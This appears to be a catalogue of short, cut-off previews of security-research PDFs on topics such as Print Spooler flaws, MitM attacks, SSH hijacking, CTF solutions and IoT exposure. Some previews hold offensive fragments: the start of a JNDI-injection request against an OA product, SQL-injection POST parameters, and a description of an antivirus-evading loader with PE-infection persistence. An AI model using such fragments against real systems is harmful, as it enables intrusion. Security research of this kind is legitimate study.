The Legacy Print Spooler: A story about  vulnerabilities from the previous  millennium until today  Peleg Hadar,​ Senior Security Researcher, SafeBreach Labs  Tomer Bar​, Research Team Leader, SafeBreach Labs  Created: ​January 2020  Updated:​ July 2020 (See the “​Updated Notes​” section)  Table of Contents Introducti...
pdf
More MitM Makes Mana Mostly Mediate Mischievous Messages @singe @cablethief dominic@sensepost.com michael@sensepost.com Tracking Scenarios Scenario 1 Snoopy Don’t go to them Make them come to you Enterprise EAP Networks Scenario 2 EAP association 4-way handshake Server Cert Client Cert EAP Relay with Sycophant By @cab...
pdf
Trust Transience: Post Intrusion SSH Hijacking July 2k5 - Blackhat USA 05 & Defcon 0x0D So you're a sneaky Blackhat... The Target Recon ● Mail headers say MUA is PINE ● .sig says Debian Sarge, kernel 2.4.22 ● Web logs show egress HTTPS traffic doesn't go via a proxy (no forwarded-for header) The Plan Let's Do It ...
pdf
Bluesnarfing @ CeBIT 2004 Detecting and Attacking bluetooth-enabled Cellphones at the Hannover Fairground Dipl.-Ing.(FH) Martin Herfurt Salzburg Research Forschungsgesellschaft mbH, Austria martin.herfurt@salzburgresearch.at March 30, 2004 Abstract A big shock went through the community when it became public, that some ...
pdf
蓝某OA后台JNDI命令执⾏ 前段时间发了⼀套组合利⽤到xmldecoder反序列化的,但是后⾯拿到源码看了下, 前台和后台的管理员账户不是⼀个密码。可能只是运⽓好,前后台⽤了同⼀个密 码。 之前就有说过后台有JNDI,且提供测试链接。⽆需保存操作。 OA使⽤的是⾃带的jdk1.7. 可以直接使⽤⽹上的Payload进⾏jndi注⼊。 EXP⼯具:https://github.com/welk1n/JNDI-Injection-Exploit 使⽤1.7地址 然后直接点击测试链接就可以: POC: POST /admin.do HTTP/1.1 Host: adderss Connection: close Connection: ...
pdf
花了⼀天时间学习WPF图形化开发,C#的图形化我没学过.原始Form实在是丑. 最后完成如下. 加密⽤的RSA. 沙盒判断也很简单,星球⾥⾯发了很多次了.(原来那个) 物理机测试免杀360(主机到了,快乐) 然后想起来看到了⼀个pe感染权限维持的项⽬,趁着⼼情好复现⼀下. 我加到了⾃⼰改的Kit⾥⾯ 前⾔ ⼝ 流沙免杀加载器 RedTeamWing 加密⽅式 加载⽅式 图标 临时⽂件 语⾔ CPU 沙盒烧过 Sleep Disk UAC Mac 进程注⼊ explore.exe 后续 msinLasm-Peiniect-dii peinject.cpp Welcome main.cpp EXPLORER main.asm peinj...
pdf
S-SDL企业应用实践 关于漏洞、风险、成本 1. 为什么软件总会有漏洞?漏洞是怎么引入的? ◦ 业务需求引入 ◦ 产品设计引入 ◦ 编码引入 2. 如何应对风险 ◦ 缓解风险 ◦ 转移风险 ◦ 接受风险 3. 安全成本 ◦ 对于企业来说,安全投入多少是合适的? 什么是S-SDL 不是一种安全技术,而是E2E的安全工程能力 也是一种Security Built In的解决方案 目标:交付更安全的系统 S-SDL架构 安全策略/安全治理 组 织 架 构 培 训 体 系 研 发 流 程 度 量 体 系 工 具 平 台 安全标准、规范、过程、知识库 人 工具 方法 质量 管理 安全是质量属性的一部分,将安全融入到质量管理是构建S-SDL的...
pdf
Hack the legacy! IBM i (aka AS/400) revealed. Bart Kulach System . . . . . : DEFCON23 Subsystem . . . . : QTRACK4 Display . . . . . : QPADEV0001 MA█ a MV 08/007 Agenda Let’s get introduced Why should we care about legacy? Evil Java? Privilege escal...
pdf
⻄湖论剑 WriteUp By Nu1L ⻄湖论剑 WriteUp By Nu1L Reverse ROR TacticalArmed Web EZupload OA?RCE? 灏妹的web EasyTp Pwn Blind string_go easykernel Misc 签到 Crypto unknown_dsa FilterRandom SpecialCurve2 hardrsa 密码⼈集合 Reverse ROR from z3 import * des = [ 0x65, 0x55, 0x24, 0x36, 0x9D, 0x71, 0xB8, 0xC8, 0x65, 0xFB, 0x87, 0x7F, 0x9A,...
pdf
摸鱼的时候在挖洞,本身想写一个文件内容过滤的小脚本(误报太多了),发现报错,看网 上貌似是编码问题,于是我就百度了下,发现 py 上加两句就可以了 # -*- coding: utf-8 -*- # coding:unicode_escape 但是当我运行的时候,我突然发现注释报错了 本来我以为是正常的报错,debug 一下,发现正常代码没任何问题,但我发现行数不对,是 在第 13 行,但是这是被注释掉的内容啊,我深入了一下发现,问题出现在 \n 和 unicode_escape 上,于是我新搞了个文件进行测试 可以成功解析\n,那么使用命令呢 我们可以看到注释的内容并不会在 debug 中跟到注释当中,但是会执行注释当...
pdf
Lockpicking Forensics by datagram www.lockpickingforensics.com www.lockwiki.com Defcon 17, 2009 www.defcon.org If you've been to a computer security conference recently you've no doubt seen people learning how to pick locks and crack safes. In the United States, interest in physical security has become a natural ex...
pdf
Popping shells with your cereal box Michael West T3h Ub3r K1tten Colin Campbell magicspacekiwi humans.txt Michael West magicspacekiwi Enjoys scanning long barcodes on the beach Professional internet tube filler "Master of the web" Barcodes are everywhere Barcodes are everywhere Barcode scanners are everywhere Barcodes ...
pdf
Cisco Catalyst Exploitation Artem Kondratenko Whoami -Penetration tester @ Kaspersky Lab -Hacker -OSC(P|E) -Skydiver ;) Cisco advisory Cisco advisory • The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combinatio...
pdf
Measuring and Integrating the Shadow Economy: A Sector-Specific Approach Brian K. Edwards, Ph.D. Silvio J. Flaim, Ph.D. Los Alamos National Laboratory June 30, 2008 2 Overview • Scope of shadow economic activity • Size of shadow economy in the United States and other countries • Why shadow economies exist • Adding a...
pdf
Walk into Starbucks, plop down a laptop, click start, watch the credentials roll in. Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the net...
pdf
Don’t Fuck It Up! Zoz jackdawsart.com Unjust laws exist: shall we be content to obey them, or shall we endeavor to amend them, and obey them until we have succeeded, or shall we transgress them at once? —Henry David Thoreau, Civil Disobedience FUCK IT UP * y o u * h a v e * b e e n * B S O D o m i z e d * y ...
pdf
早上起来刷了下朋友圈,看到了一个新漏洞 蓝凌 OA 存在任意文件写入???蓝凌????并且还有漏洞地址 漏洞在/sys/search/sys_search_main/sysSearchMain.do 下面 这里也给出了 method 为 editrParam。参数为 FdParameters 已经很明确了,那么复现一下。 在 com.landray.kmss.sys.search.jar 中的 com.landray.kmss.sys.search.actions.SysSearchMainAction 类。 method 为 editrParam。 看下流程。 大概就是对 fdParemNames 的内容进行了判空。如果不为空。进...
pdf
物 联 网 资 产 变 化 研 究 演 讲 人 : 桑 鸿 庆 绿 盟 科 技 资 深 安 全 研 究 员 2019 PART 01 简介 目录 CONTENTS PART 02 IPv4地址变化 PART 03 分析 PART 04 IPv6地址变化 01 02 03 04 PART 05 影响与建议 05 PART 01 网 络 空 间 引 擎 与 物 联 网 资 产 识 别 简 介 《唐人街探案2》中片段 挪威 Finse 1222酒店 图片来源于网络 网 络 空 间 搜 索 引 擎 物 联 网 资 产 暴 露 概 况 资产 协议探测 Banner 设备识别 Label 41,791 993,445 4,...
pdf
一个注入点分析 请求 URL: http://www.xxx.com POST 数据: dfpageControl.pageNum=1&dfpageControl.grd_gridId=PER&dfpageControl.co nditionStr=&dfpageControl.ducs[0].duc_fieldCondition=where_equals&dfpageC ontrol.ducs[0].duc_fieldValue=114730&dfpageControl.ducs[0].duc_fieldSplit= and &dfpageControl.ducs[0].duc_fieldName=per_code&d...
pdf
IPv6 is Bad for Your Privacy Janne Lindqvist Helsinki University of Technology Telecommunications Software and Multimedia Laboratory P.O. Box 5400, FIN-02015 TKK, Finland janne.lindqvist@tml.hut.fi Abstract. In recent years, covert channel techniques for IPv4 and more recently for IPv6 have been published by the scienti...
pdf